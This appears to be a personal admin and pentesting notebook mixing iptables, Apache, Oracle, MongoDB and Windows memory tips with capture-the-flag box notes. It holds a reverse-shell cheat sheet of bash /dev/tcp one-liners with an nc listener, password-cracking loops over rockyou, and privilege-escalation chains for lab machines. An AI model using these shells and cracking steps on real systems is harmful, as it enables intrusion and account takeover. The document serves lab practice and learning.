Unblock an iptables rule (e.g. a fail2ban ban)
# list the rules of the fail2ban chain with their line numbers
iptables -L f2b-apache-auth -n --line-numbers
# line numbers are per chain, so delete from the same chain that was listed
iptables -D f2b-apache-auth <line number>
OWASP recommendation as a module (Apache / Nginx)
https://coreruleset.org/installation/
Hardened Nginx
https://github.com/bunkerity/bunkerized-nginx
(via Korben)
To get the bytecode of the classes modified by the agent:
-Dintroscope.agent.instrumentation.verification.debug=<prefix to dump> -Dintroscope.agent.instrumentation.debugdump.path=/tmp/mydir/
Example prefix: com/springframework/utils
If no class with the "after" suffix is dumped,
then the class has not been instrumented.
/!\ Don't forget the trailing "/" on the directory... otherwise it is used as a file name prefix
So I don't redo the same ones :)
CyberSploit: 1
robots.txt + kernel
CyberSploit: 2
rot47 + password on the website + docker (GTFOBins)
Funbox3: Easy
easy password/SQL injection + p0wny-shell + sudo (time or pkexec or mtr)
FourAndSix2
nfs + hashcat (7z) + id_rsa (hint in the images) + less (GTFOBins)
FourAndSix
mount /shared, and mount / is not exported
Funbox1
wordpress low password (wpscan), upload shell/ssh user (joe) has same password, bad permissions between joe and funny, crontab executed by funny, reverse shell, put new ssh key on funny, funny member of lxd, (https://www.hackingarticles.in/lxd-privilege-escalation/ : new image, add mapping for root, connect to image. There is a faster way : root crontab run same script as funny :) :) : can modify /root or list flag or whatever, stickbit, add sudo...
Funbox2: Rookie
ftp anonymous, hidden files, list of protected zips, zip2john on all the zips, 2 have easy passwords, unprotected rsa key, user belongs to the lxd group, same as Funbox1 for the rest
Funbox4: CTF
ROBOTS.txt, scroll down, hidden file: upload.php (add the extension for dirb), upload shell, check user home, bruteforce with rockyou + ! for thomas, and normally gcc + kernel exploit, but no gcc on the server....
Quaoar:
wordpress low password or plugin vulnerability (wpscan), reverse shell, wpconfig (root db password), weak root (same as db) or weak wpadmin
Funbox5: next Level
dirb, Request Control plugin for Firefox (for IP redirection)
Cheat sheet
perl 7z2hashcat.pl ../tmp/backup.7z > ../tmp/hash.txt
# or
7z2john.py archive.7z > hash.txt
then (https://infinitelogins.com/2020/04/29/how-to-crack-encrypted-7z-archives/):
hashcat -m 11600 lightweight7z.hash /usr/share/wordlists/rockyou.txt
or (https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c)
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
From the command line (grep must be pointed at the extraction directory, "out" here):
cat /usr/share/wordlists/rockyou.txt | while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH out; then echo "$line"; break; fi; done
cat /usr/share/wordlists/rockyou.txt | while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo "$line"; break; fi; done
Step 1: Turn your host into a gateway.
$ sudo -i
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# exit
If you want to keep IP forwarding after a host reboot, remember to uncomment the line "net.ipv4.ip_forward=1" in /etc/sysctl.conf. To restore the default policy in the NAT table, remember the command:
sudo iptables -t nat -P POSTROUTING ACCEPT
Step 2: Add a default route on the guest:
sudo route add -net default gw IPHote
Don't forget to replace IPHote with the IP address of the interface VirtualBox created on the host.
All that is left is to configure DNS (/etc/resolv.conf) and you are done.
Cheat sheet, scanning common URLs
dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt
To find directories writable by group or others (the original note calls these sticky bits; the sticky bit itself would be -perm -1000):
find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \;
For setuid/setgid files (https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/)
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
Reverse shell from different sources
Listen:
nc -l -vv -p <PORT>
Bash examples:
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
Because of a lost save when Firefox crashed... a fast restart (browser console snippet for the game):
$.each(SharkGame.ResourceTable, function(k, v) {
    if (k != 'essence' && k != 'numen' && k != 'chorus') {
        console.log(k);
        SharkGame.PlayerResources[k] = {};
        SharkGame.PlayerResources[k].amount = 1000000;
        SharkGame.PlayerResources[k].totalAmount = 1000000;
        SharkGame.PlayerResources[k].incomeMultiplier = 1000000;
    }
});
Added a rule so that the acme directory stays reachable over plain HTTP (the HTTP-to-HTTPS redirect skips /.well-known/acme-challenge/, which is what the Let's Encrypt HTTP-01 validation fetches)
<VirtualHost *:80>
RewriteEngine on
RewriteCond %{HTTPS} !=on [NC]
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
Include /etc/apache2/sites/demo.conf
</VirtualHost>
<VirtualHost *:443>
Include /etc/apache2/sites/demo.conf
SSLEngine on
SSLCertificateFile /etc/ssl/certs/demo.signed.crt
SSLCertificateKeyFile /etc/ssl/private/demo.key
SSLCertificateChainFile /etc/ssl/certs/letsencrypt-root-intermediate.pem
</VirtualHost>
Obviously, there is philanthropy too ^^
Quote:
I ran memtest86 and got two bad memory spots in two tests (Moving inversions, random pattern):
0x1BFAE5474
0x116A3FE55
Windows is able to blacklist bad memory addresses using the bcdedit tool. However it only blacklists pages of memory (4KB) instead of single addresses. In order to convert from memtest86 single address syntax to bcdedit pages syntax I had to remove the last 3 letters from each memory address (since 0xFFF is 4KB).
memtest86    | bcdedit   | Memory range from | Memory range to | Size
0x1BFAE5474  | 0x1BFAE5  | 0x1BFAE5000       | 0x1BFAE5FFF     | 4 KB
0x116A3FE55  | 0x116A3F  | 0x116A3F000       | 0x116A3FFFF     | 4 KB
Running command prompt as administrator I could blacklist the memory addresses:
# Enable memory blacklisting
bcdedit /set {badmemory} badmemoryaccess no
# Specify what addresses to blacklist
bcdedit /set {badmemory} badmemorylist 0x1bfae5 0x116a3f
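The address-to-page conversion from the quote, as an added example (not part of the quoted post): it derives the bcdedit page numbers and page ranges from memtest86 fault addresses and builds the badmemorylist command, dropping duplicate pages. The two input addresses are the ones from the quote; the function names are my own.

```shell
# Convert a memtest86 fault address into the 4 KB page number bcdedit expects.
# Dropping the low 12 bits (0xFFF = 4 KB - 1) is the "remove the last 3 hex
# digits" rule from the quote. Output is lowercase hex with a 0x prefix.
memtest_to_page() {
    printf '0x%x\n' $(( $1 >> 12 ))
}

# Print the first and last byte address covered by a page number,
# i.e. the "Memory range from / to" columns of the table above.
page_range() {
    printf '0x%x 0x%x\n' $(( $1 << 12 )) $(( ($1 << 12) + 0xFFF ))
}

# Build the bcdedit command for any number of fault addresses. Two faults that
# fall in the same 4 KB page must be listed only once, so pages are deduplicated.
badmemory_cmd() {
    pages=""
    for addr in "$@"; do
        page=$(memtest_to_page "$addr")
        case " $pages " in
            *" $page "*) ;;                 # page already listed
            *) pages="$pages $page" ;;
        esac
    done
    printf 'bcdedit /set {badmemory} badmemorylist%s\n' "$pages"
}

# Constructed input: the two addresses reported in the quoted memtest86 run.
badmemory_cmd 0x1BFAE5474 0x116A3FE55
```

The command printed for these two inputs matches the badmemorylist line in the quote.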
Server-side template hacking helper
To run a long-running query in Oracle (the function busy-loops for 3 minutes and returns the iteration count):
View:
create or replace function TEST_PROC return number
IS
    start_time DATE := sysdate;
    end_time   DATE;
    curr_time  DATE;
    id         number := 0;
begin
    end_time := start_time + interval '3' minute;
    loop
        id := id + 1;
        curr_time := sysdate;
        exit when curr_time > end_time;
    end loop;
    return id;
end TEST_PROC;
create or replace VIEW TEST_VIEW (ID) as SELECT TEST_PROC() as ID from dual;
select * from TEST_VIEW;
showing current expensive queries plus most expensive object from execution plan:
select sa.sql_id,
sp.child_number,
sp.plan_hash_value,
sa.parsing_schema_name SQL_PARSED_BY,
sa.module,
sa.action,
sa.buffer_gets,
sa.BG_PER_EXEC,
sp.object_owner,
--sp.object_name, -- this is the group factor
sa.optimizer_cost,
sp.cost COST_PER_EXP_OBJECT,
round((sp.cost/sa.optimizer_cost)*100,0) OBJECT_COST_RELATION,
listagg(OBJECT_NAME,', ') within group (order by object_name) MOST_EXPENSIVE_OBJECTS,
sa.sql_text
from
(select sql_id,
child_number,
parsing_schema_name,
module,action,
buffer_gets,
round(buffer_gets/nullif(executions,0),0) BG_PER_EXEC,
optimizer_cost,
sql_text
from v$sql
where parsing_schema_name <>'SYS'
) sa,
(select sql_id, child_number, plan_hash_value, object_owner, object_name,cost,
rank() over (partition by sql_id,child_number order by cost desc nulls last) costrank
-- result set partitioned by sql and child to avoid duplicates
-- when same sql is executed by multiple users
from v$sql_plan
where (operation like '%INDEX%' or operation like '%TABLE%' or operation like '%MAT%')
--and options='FULL' -- would limit to full table scans / full object scans
and object_owner <>'SYS'
) sp
where sa.sql_id=sp.sql_id
and sa.child_number=sp.child_number
and costrank=1 -- only use top costly object of each partition
group by sa.sql_id,
sp.child_number,
sp.plan_hash_value,
sa.parsing_schema_name,
sa.module,
sa.action,
sa.buffer_gets,
sa.BG_PER_EXEC,
sp.object_owner,
--sp.object_name, -- this is the group factor
sa.optimizer_cost,
sp.cost,
round((sp.cost/sa.optimizer_cost)*100,0),
sa.sql_text
order by BG_PER_EXEC desc nulls last
;
Maze generation.
Find by id:
db.test.find({"_id" : ObjectId("4ecc05e55dd98a436ddcc47c")})
Show all ids:
var a = db.c.find({}, {_id:1}).map(function(item){ return item._id; });
Run actions on elements (the callback parameter is the current element, so test it, not an undefined variable):
tests.forEach(function(test) {
    if (test.hasOwnProperty('toto')) {
        print('toto was here');
    } else {
        db.tests.save(test);
    }
});
Run javascript:
load('/tmp/xxx.js');
Connect to database:
db = connect("mongodb://user:password@localhost:27017/lcri?authSource=admin");
Escaping restricted shells.
And tar, zip and awk can be used to launch an interactive shell, I learn something every day...
A checklist: https://github.com/frizb/Linux-Privilege-Escalation
Another one: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
Worth a look: https://www.metahackers.pro/breakout-of-restricted-shell/
And probably a service that will become paid later...
And a bit more fun for SEO :)